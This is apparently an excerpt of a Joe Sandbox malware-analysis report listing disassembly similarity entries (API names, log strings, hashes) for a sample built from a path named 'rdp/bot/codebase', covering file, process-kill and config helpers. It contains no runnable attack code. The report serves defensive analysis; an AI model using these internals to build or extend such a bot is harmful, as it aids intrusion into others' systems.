                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Heap$Processstrlen$AllocFree
                                    • String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                                    • API String ID: 1318626975-3964590784
                                    • Opcode ID: 9aa4ad5710ba47d1f93b0edbb4dbda2cd6f3467b747c308e6e1de2fea1d8c66b
                                    • Instruction ID: f162db73066fd9b54d7c1c10fa6bfd67edd63c944afb02ecd146d5d63e799fbe
                                    • Opcode Fuzzy Hash: 9aa4ad5710ba47d1f93b0edbb4dbda2cd6f3467b747c308e6e1de2fea1d8c66b
                                    • Instruction Fuzzy Hash: 9B31C726988A4344FB90BF12E8143B59BA0AF40B84FD85133DA4DA77F5DF3CE8159362
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: AttributesFile$ErrorLast
                                    • String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                                    • API String ID: 365566950-3085771803
                                    • Opcode ID: f5911b0597268605da7c68ab9bf962752b1e02f0852cc6a06eb7331b6788ea4b
                                    • Instruction ID: 5432845ec0433f4e591bb47dd6598c9835ab6c3c4aac8ed81a7664251eb0e4f1
                                    • Opcode Fuzzy Hash: f5911b0597268605da7c68ab9bf962752b1e02f0852cc6a06eb7331b6788ea4b
                                    • Instruction Fuzzy Hash: 54517F61A8C64795FAA0BB129450378FE90AF00344FA44233D91EE66F5DE3CF947A723
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                                    • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                                    • API String ID: 497672076-1436771859
                                    • Opcode ID: be40d166d65ee0fd826c179aebf8d274529e1f5329d112457eecbd3a16b0776b
                                    • Instruction ID: 09430797f2053a4c01453ff2e2e8104c7852c664a221ed2abb0fc41aa3fcfa13
                                    • Opcode Fuzzy Hash: be40d166d65ee0fd826c179aebf8d274529e1f5329d112457eecbd3a16b0776b
                                    • Instruction Fuzzy Hash: A3417262B9C58380FAB0B716E4107B8DE91AF50768F964333C41DA76F19E3CE5A59323
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
                                    • String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
                                    • API String ID: 4155868088-3920367287
                                    • Opcode ID: 98cc37affdbc9853e1a9166010f45109071c9e9919c2ed23c9d2c199f0cdb42d
                                    • Instruction ID: 7938270797eb9a50334714d0c4335abe1c2e815124c10ec54c37678f4d2a0cd8
                                    • Opcode Fuzzy Hash: 98cc37affdbc9853e1a9166010f45109071c9e9919c2ed23c9d2c199f0cdb42d
                                    • Instruction Fuzzy Hash: 6331622568874781FAA0BB06E450379BB90AB44F80F848133CA4DA73F1DE3DE995D322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: ErrorFileLastModuleName
                                    • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
                                    • API String ID: 2776309574-2006444783
                                    • Opcode ID: 4b8e4eb41ae9378e3f657afe959d27e4c49e50872b6dd60d7d795c4887aa8013
                                    • Instruction ID: 015b4a9d4ab7a7bc4ee683a34f139a5cad8d52398a7571dd7f24f14e598f5da3
                                    • Opcode Fuzzy Hash: 4b8e4eb41ae9378e3f657afe959d27e4c49e50872b6dd60d7d795c4887aa8013
                                    • Instruction Fuzzy Hash: D6315261E9850751EAA1FB11E9107B4AB90BF04748FC95133D90CA71F1EF7CE52AD322
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: ErrorFileLast$CloseCreateHandleSize
                                    • String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                                    • API String ID: 3555958901-1687387729
                                    • Opcode ID: 17a3905e18cdb1d8a85cd9336cce15a49220aaebdb1d37666bd8c7ae0042426b
                                    • Instruction ID: d7b22898c096fc8f5fb3f67b2cddfa49361b491a7d5a4ce64792648328cc7e6c
                                    • Opcode Fuzzy Hash: 17a3905e18cdb1d8a85cd9336cce15a49220aaebdb1d37666bd8c7ae0042426b
                                    • Instruction Fuzzy Hash: C3612A55E8C11282FAE07616A0543B89A609F41364FA94733C45FFB2F1CE3DEC866273
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: ErrorLastObjectSingleWait
                                    • String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
                                    • API String ID: 1211598281-4195011794
                                    • Opcode ID: 0deb97dcf852c4bc4058bdc4b606e96b5df0ddae11b4762ffe8ba045f7a623f4
                                    • Instruction ID: fb191ab6f2fabcaa39f7ed12bce9a80337eedf295fa18bdf24171c881faa8a16
                                    • Opcode Fuzzy Hash: 0deb97dcf852c4bc4058bdc4b606e96b5df0ddae11b4762ffe8ba045f7a623f4
                                    • Instruction Fuzzy Hash: D3310E10E8C20392FAE07756A4947789A909F44304EE49233C65FE62F29D7DFD87A273
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateErrorHandleLastTime
                                    • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                                    • API String ID: 2291555494-3647951244
                                    • Opcode ID: 1580c463ac1a67233ffed9850a7684daecf6e87ee339f2778340ad3587e2fc21
                                    • Instruction ID: ed750b02e808ce959cb54256cef27448755672d45d022d1ab4aa1cf1c0e5ec6d
                                    • Opcode Fuzzy Hash: 1580c463ac1a67233ffed9850a7684daecf6e87ee339f2778340ad3587e2fc21
                                    • Instruction Fuzzy Hash: B5515261E8815282F6A07A5295183789AA06F007A4F984333D91FEB2F4DE3DE945A363
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: _errno$_strtoui64
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                    • API String ID: 3513630032-2210897324
                                    • Opcode ID: 0ca38be50db268a6cad6d239e6e380c7a805df0f1447118d3c9ec6f79f631668
                                    • Instruction ID: a103f786bb73f118fe9517c70f5d4938de031284242cd4fb91109d486530d533
                                    • Opcode Fuzzy Hash: 0ca38be50db268a6cad6d239e6e380c7a805df0f1447118d3c9ec6f79f631668
                                    • Instruction Fuzzy Hash: 3521D521648A4786E391AF11F8407BABBA0BB44784F844133EE4CA77B4DF3CE455D722
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Virtual$ErrorLastProtectQuery
                                    • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                    • API String ID: 637304234-2693646698
                                    • Opcode ID: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                                    • Instruction ID: b086b09f24b19e68972de8d2ab080194fd4f29386ed7304efdee58e6a80d26d8
                                    • Opcode Fuzzy Hash: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                                    • Instruction Fuzzy Hash: 2731D469B4960249EB90AB12E851378EBA1EF48B80B859237DD0C973F4DE3CF4558721
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: _errno
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                    • API String ID: 2918714741-1991603811
                                    • Opcode ID: fe742d66581b0ccb4e8f88428579443916f0f27324e58e89ecaf8bb4bd76b93c
                                    • Instruction ID: 132df21fd6feabfe49492b19e6345bafa4182e5391fc55d7c2d2fd1fe243b39e
                                    • Opcode Fuzzy Hash: fe742d66581b0ccb4e8f88428579443916f0f27324e58e89ecaf8bb4bd76b93c
                                    • Instruction Fuzzy Hash: 42216022A4864792E791AF12ED40BAABBA0BB44784F844133EE4C577F4DF3CE855D712
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                    • API String ID: 1211020085-2360327764
                                    • Opcode ID: ef7e762a1eac82a88f4eb49202e04d18e0dfc05369fbeb0f336ab9798df975d3
                                    • Instruction ID: ad753efdbadb6d9ba53cae315bb3f989c0302382a96baa0ea032752001b07e9f
                                    • Opcode Fuzzy Hash: ef7e762a1eac82a88f4eb49202e04d18e0dfc05369fbeb0f336ab9798df975d3
                                    • Instruction Fuzzy Hash: 9211B456A8970342FAE87752A4903769F90EF00745FC41137CD0EAA2F4DF3DE8559223
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                    • API String ID: 1211020085-2360327764
                                    • Opcode ID: a959144ebdbb34fc87530ded86d3f35840680b6be22af1ffe380b90cd5227081
                                    • Instruction ID: b8ab79dd3870d10852cc31e37a7aacb2e0eb2e0d36a8327d609084b576bbc3dd
                                    • Opcode Fuzzy Hash: a959144ebdbb34fc87530ded86d3f35840680b6be22af1ffe380b90cd5227081
                                    • Instruction Fuzzy Hash: 8C11D656A8970342FAE87752A4903769F90EF00745FC41137CD0EAA2F5DF3DE8559223
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                    • API String ID: 1211020085-2360327764
                                    • Opcode ID: 2496d2f5fa8d00559008dfae579644d76cd319a1d0937b540e789750984efad3
                                    • Instruction ID: 230f79df6c09a114afd71758a0339e795635d3454a13a33fa15beb857d58ca2b
                                    • Opcode Fuzzy Hash: 2496d2f5fa8d00559008dfae579644d76cd319a1d0937b540e789750984efad3
                                    • Instruction Fuzzy Hash: 3311D656A8970342FAE87752A4903769F90EF00745FC41137CD0EAA2F4DF3DE8559223
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                    • API String ID: 1211020085-2360327764
                                    • Opcode ID: 84487d85988c67a68760dd499a58440e7c90953792b81ae61c4816666b24c856
                                    • Instruction ID: b380a20a2da7947742fad8c07d7ee376efd7037dfcc983c20a630a008aac9822
                                    • Opcode Fuzzy Hash: 84487d85988c67a68760dd499a58440e7c90953792b81ae61c4816666b24c856
                                    • Instruction Fuzzy Hash: 5511E416A8870342FAE87752A4903369F90EF00741FC40137CD4EAA2F4DF3DE8449223
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CopyErrorFileLastfflushfwrite
                                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                    • API String ID: 2887799713-3464183404
                                    • Opcode ID: 66f0d41b67bf7db472c2c6d003715f51e780ae4141bf3cabbed7ce59c5551692
                                    • Instruction ID: da6689e725fe9c9fbd52c97be58fa34b698feb96a3ecf346ad031c17b2fb04cc
                                    • Opcode Fuzzy Hash: 66f0d41b67bf7db472c2c6d003715f51e780ae4141bf3cabbed7ce59c5551692
                                    • Instruction Fuzzy Hash: 64413155D8D61681F6E46617A8003B9DEA07F00BD8ED44233C90FA66F4EEBDF641A723
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
